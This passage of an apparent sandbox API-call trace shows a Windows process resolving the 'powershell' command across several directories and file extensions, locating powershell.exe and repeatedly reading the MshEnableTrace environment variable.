	[0428.234] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.234] SetErrorMode (uMode=0x1) returned 0x1
	[0428.234] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.234] SetErrorMode (uMode=0x1) returned 0x1
	[0428.234] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.235] SetErrorMode (uMode=0x1) returned 0x1
	[0428.235] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.235] SetErrorMode (uMode=0x1) returned 0x1
	[0428.235] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.235] SetErrorMode (uMode=0x1) returned 0x1
	[0428.236] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.236] SetErrorMode (uMode=0x1) returned 0x1
	[0428.236] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.236] SetErrorMode (uMode=0x1) returned 0x1
	[0428.236] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.236] SetErrorMode (uMode=0x1) returned 0x1
	[0428.236] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.237] SetErrorMode (uMode=0x1) returned 0x1
	[0428.237] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.237] SetErrorMode (uMode=0x1) returned 0x1
	[0428.237] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.237] SetErrorMode (uMode=0x1) returned 0x1
	[0428.237] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.238] SetErrorMode (uMode=0x1) returned 0x1
	[0428.238] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.238] SetErrorMode (uMode=0x1) returned 0x1
	[0428.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.238] SetErrorMode (uMode=0x1) returned 0x1
	[0428.238] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.239] SetErrorMode (uMode=0x1) returned 0x1
	[0428.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.239] SetErrorMode (uMode=0x1) returned 0x1
	[0428.239] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.239] SetErrorMode (uMode=0x1) returned 0x1
	[0428.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.240] SetErrorMode (uMode=0x1) returned 0x1
	[0428.240] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.240] SetErrorMode (uMode=0x1) returned 0x1
	[0428.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.240] SetErrorMode (uMode=0x1) returned 0x1
	[0428.240] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.240] SetErrorMode (uMode=0x1) returned 0x1
	[0428.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.241] SetErrorMode (uMode=0x1) returned 0x1
	[0428.241] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.241] SetErrorMode (uMode=0x1) returned 0x1
	[0428.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.241] SetErrorMode (uMode=0x1) returned 0x1
	[0428.242] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.242] SetErrorMode (uMode=0x1) returned 0x1
	[0428.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.242] SetErrorMode (uMode=0x1) returned 0x1
	[0428.242] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.242] SetErrorMode (uMode=0x1) returned 0x1
	[0428.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.243] SetErrorMode (uMode=0x1) returned 0x1
	[0428.243] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.243] SetErrorMode (uMode=0x1) returned 0x1
	[0428.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.243] SetErrorMode (uMode=0x1) returned 0x1
	[0428.243] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.244] SetErrorMode (uMode=0x1) returned 0x1
	[0428.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.244] SetErrorMode (uMode=0x1) returned 0x1
	[0428.244] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.244] SetErrorMode (uMode=0x1) returned 0x1
	[0428.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.244] SetErrorMode (uMode=0x1) returned 0x1
	[0428.245] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.245] SetErrorMode (uMode=0x1) returned 0x1
	[0428.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.245] SetErrorMode (uMode=0x1) returned 0x1
	[0428.245] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.245] SetErrorMode (uMode=0x1) returned 0x1
	[0428.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.246] SetErrorMode (uMode=0x1) returned 0x1
	[0428.246] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.246] SetErrorMode (uMode=0x1) returned 0x1
	[0428.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.246] SetErrorMode (uMode=0x1) returned 0x1
	[0428.246] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.247] SetErrorMode (uMode=0x1) returned 0x1
	[0428.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.247] SetErrorMode (uMode=0x1) returned 0x1
	[0428.247] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.247] SetErrorMode (uMode=0x1) returned 0x1
	[0428.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.248] SetErrorMode (uMode=0x1) returned 0x1
	[0428.248] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.248] SetErrorMode (uMode=0x1) returned 0x1
	[0428.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.248] SetErrorMode (uMode=0x1) returned 0x1
	[0428.248] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.249] SetErrorMode (uMode=0x1) returned 0x1
	[0428.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.249] SetErrorMode (uMode=0x1) returned 0x1
	[0428.249] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.249] SetErrorMode (uMode=0x1) returned 0x1
	[0428.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.249] SetErrorMode (uMode=0x1) returned 0x1
	[0428.250] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.250] SetErrorMode (uMode=0x1) returned 0x1
	[0428.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.250] SetErrorMode (uMode=0x1) returned 0x1
	[0428.250] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3bf310
	[0428.251] FindNextFileW (in: hFindFile=0x3bf310, lpFindFileData=0x1c88deb0 | out: lpFindFileData=0x1c88deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0428.252] FindClose (in: hFindFile=0x3bf310 | out: hFindFile=0x3bf310) returned 1
	[0428.252] SetErrorMode (uMode=0x1) returned 0x1
	[0428.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c88dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0428.253] SetErrorMode (uMode=0x1) returned 0x1
	[0428.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c88e1d0 | out: lpFileInformation=0x1c88e1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0428.253] SetErrorMode (uMode=0x1) returned 0x1
	[0428.254] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.254] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.439] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.439] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.442] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.442] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.452] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.452] CoTaskMemFree (pv=0x1b91ca40) 
